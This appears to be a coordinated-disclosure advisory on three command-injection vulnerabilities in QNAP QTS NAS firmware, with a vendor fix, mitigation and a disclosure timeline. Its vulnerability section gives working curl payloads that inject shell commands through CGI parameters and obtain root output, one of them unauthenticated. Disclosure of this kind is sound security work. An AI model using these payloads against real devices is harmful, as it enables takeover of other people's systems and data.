197 lines
No EOL
6.3 KiB
Text
197 lines
No EOL
6.3 KiB
Text
QNAP QTS multiple RCE vulnerabilities
|
|
=====================================
|
|
The latest version of this advisory is available at:
|
|
https://sintonen.fi/advisories/qnap-qts-multiple-rce-vulnerabilities.txt
|
|
|
|
|
|
Overview
|
|
--------
|
|
|
|
QNAP QTS firmware contains multiple Command Injection (CWE-77)
|
|
vulnerabilities that can be exploited to gain remote command execution
|
|
on the devices.
|
|
|
|
|
|
Description
|
|
-----------
|
|
|
|
QNAP QTS web user interface CGI binaries include Command Injection
|
|
(CWE-77) vulnerabilities. An unauthenticated attacker can execute
|
|
arbitrary commands on the targeted device.
|
|
|
|
|
|
Impact
|
|
------
|
|
|
|
The attacker is able to execute arbitrary commands as administrative user
|
|
(root). The attacker has full access to all content on the targeted
|
|
device, and can read, modify or remove content at will.
|
|
|
|
|
|
Details
|
|
-------
|
|
|
|
The discovered vulnerabilities, described in more detail below, enable
|
|
multiple independent attacks described here in brief:
|
|
|
|
- Unauthenticated Remote Command Execution
|
|
|
|
The unauthenticated attacker can perform HTTP requests that exploit
|
|
the vulnerability to execute arbitrary commands. If the device is
|
|
connected to the internet, the vulnerable devices can be taken over in
|
|
an automated fashion and can then be used for further attacks.
|
|
|
|
- Authenticated Remote Command Execution
|
|
|
|
The authenticated attacker can perform HTTP requests that exploit
|
|
the vulnerabilities to execute arbitrary commands. This gives users
|
|
that normally have only restricted access to the device full
|
|
administrative (root) access to the system and access to all data
|
|
stored on the device regardless of the specified access limitations.
|
|
|
|
|
|
Vulnerabilities
|
|
---------------
|
|
|
|
1. [CVE-2017-6361] Command Injection in authLogin.cgi `reboot_notice_msg' (CWE-77)
|
|
|
|
/cgi-bin/authLogin.cgi CGI has a command injection bug. The
|
|
following commands are executed via system():
|
|
|
|
/sbin/vjbod_util -i '%s' 1>>/dev/null 2>&1
|
|
/sbin/vdd_control "%s" %d 2>>/dev/null 2>>/dev/null
|
|
|
|
The value inserted to %s is obtained from the `reboot_notice_msg' HTTP
|
|
request GET parameter.
|
|
|
|
The reboot_notice_msg is a base64 encoded message of form:
|
|
|
|
QNAPVJBDTTTTTTTTCCCCCCCCCCCCCCCCLLLLPAYLOAD
|
|
|
|
- TTTTTTTT is the unix time stamp (last 8 digits)
|
|
- CCCCCCCCCCCCCCCC is the command to perform (Disconnect)
|
|
- LLLL is the payload length
|
|
- PAYLOAD is the payload contents (LLLL bytes)
|
|
|
|
By creating a crafted reboot_notice_msg value, arbitrary commands
|
|
can be executed. For example:
|
|
|
|
QNAPVJBD88150863 Disconnect 14`(echo;id)>&2`
|
|
|
|
$ curl -ki "https://TARGET/cgi-bin/authLogin.cgi?reboot_notice_msg=$(printf 'QNAPVJBD%08d%16s 14`(echo;id)>&2`' $(expr $(date +%s) % 100000000) Disconnect|base64|tr -d '\r\n')"
|
|
uid=0(admin) gid=0(administrators) groups=0(administrators),100(everyone)
|
|
Content-type: text/xml
|
|
|
|
<?xml version="1.0" encoding="UTF-8" ?>
|
|
<QDocRoot version="1.0">
|
|
<command>Disconnect</command>
|
|
<payload>`(echo;id)>&2`</payload>
|
|
</QDocRoot>
|
|
$
|
|
|
|
|
|
2. [CVE-2017-6360] Command Injection in userConfig.cgi cloudPersonalSmtp `hash' (CWE-77)
|
|
|
|
/cgi-bin/userConfig.cgi CGI has a command injection bug. The following
|
|
command is executed via popen():
|
|
|
|
/sbin/cloud_util -r %s 2>/dev/null
|
|
|
|
The value inserted to %s is obtained from the `hash' HTTP request GET
|
|
parameter.
|
|
|
|
An authenticated user can use a specially crafted hash parameter to execute
|
|
arbitrary commands as root:
|
|
|
|
$ curl -ki 'https://TARGET/cgi-bin/userConfig.cgi?func=cloudPersonalSmtp&sid=SIDVALUE&hash=`(echo;id;uname%20-a)>%262`'
|
|
HTTP/1.1 200 OK
|
|
Date: Sun, 26 Feb 2017 22:55:48 GMT
|
|
Transfer-Encoding: chunked
|
|
Content-Type: text/plain
|
|
|
|
uid=0(admin) gid=0(administrators) groups=0(administrators),100(everyone)
|
|
Linux TARGET 3.12.6 #1 SMP Mon Feb 13 01:43:01 CST 2017 x86_64 unknown
|
|
Content-type: text/html; charset="UTF-8"
|
|
|
|
Usage:
|
|
/sbin/cloud_util -r [enc_token]
|
|
$
|
|
|
|
|
|
3. [CVE-2017-6359] Command Injection in utilRequest.cgi cancel_trash_recovery `pid' (CWE-77)
|
|
|
|
/cgi-bin/filemanager/utilRequest.cgi CGI has a command injection bug. The
|
|
following commands are executed via system():
|
|
|
|
/bin/kill -9 %s
|
|
|
|
The value inserted to %s is obtained from the `pid' HTTP request GET
|
|
parameter.
|
|
|
|
An authenticated user can use a specially crafted pid parameter to execute
|
|
arbitrary commands as root:
|
|
|
|
$ curl -k 'https://TARGET/cgi-bin/filemanager/utilRequest.cgi?func=cancel_trash_recovery&sid=SIDVALUE&pid=`id>/tmp/pwned`'
|
|
{ "version": "4.2.1", "build": "20170213", "status": 0, "success": "true" }
|
|
|
|
[~] # cat /tmp/pwned
|
|
uid=0(admin) gid=0(administrators) groups=0(administrators),100(everyone)
|
|
[~] #
|
|
|
|
|
|
Vulnerable devices
|
|
------------------
|
|
|
|
The vulnerabilities were discovered from an QNAP TVS-663, firmware version
|
|
4.2.2 Build 20161214. They're also confirmed to work with version 4.2.3
|
|
Build 20170213.
|
|
|
|
CVE-2017-6361 was also confirmed on QNAP HS-251+ running QTS 4.2.2 Build
|
|
20161028.
|
|
|
|
It is believed that these vulnerabilities affect all devices running QTS.
|
|
|
|
|
|
Recommendations to vendor
|
|
-------------------------
|
|
|
|
1. Fix the command injection vulnerabilities by performing proper input
|
|
validation (whitelisting) and/or shell metacharacter escaping, or by
|
|
utilizing execl family of functions.
|
|
|
|
|
|
End user mitigation
|
|
-------------------
|
|
|
|
- Install the firmware update version 4.2.4 build 20170313 or later.
|
|
|
|
OR
|
|
|
|
- Restrict access to the web user interface (ports 8080 and 443).
|
|
|
|
|
|
Credits
|
|
-------
|
|
|
|
The vulnerabilities were discovered by Harry Sintonen / F-Secure Corporation.
|
|
|
|
|
|
Timeline
|
|
--------
|
|
|
|
21.01.2017 discovered vulnerabilities 2 and 3
|
|
23.02.2017 discovered vulnerability 1
|
|
23.02.2017 reported vulnerability 1 to the vendor
|
|
26.02.2017 started to write a preliminary advisory
|
|
27.02.2017 sent the preliminary advisory to vendor and CERT-FI
|
|
27.02.2017 requested CVE-IDs from MITRE
|
|
28.02.2017 received CVE-IDs from MITRE
|
|
02.03.2017 inquired status from vendor contact
|
|
02.03.2017 vendor confirmed CVE-2017-6361
|
|
04.03.2017 vendor confirmed the other two vulnerabilities
|
|
13.03.2017 vendor communicated about a upcoming release fixing the vulns
|
|
14.03.2017 vendor released QTS 4.2.4 build 20170313 fixing the vulns
|
|
15.03.2017 sent update to CERT-FI
|
|
21.03.2017 vendor released NAS-201703-21 advisory:
|
|
https://www.qnap.com/en/support/con_show.php?cid=113
|
|
06.04.2017 public release of the advisory |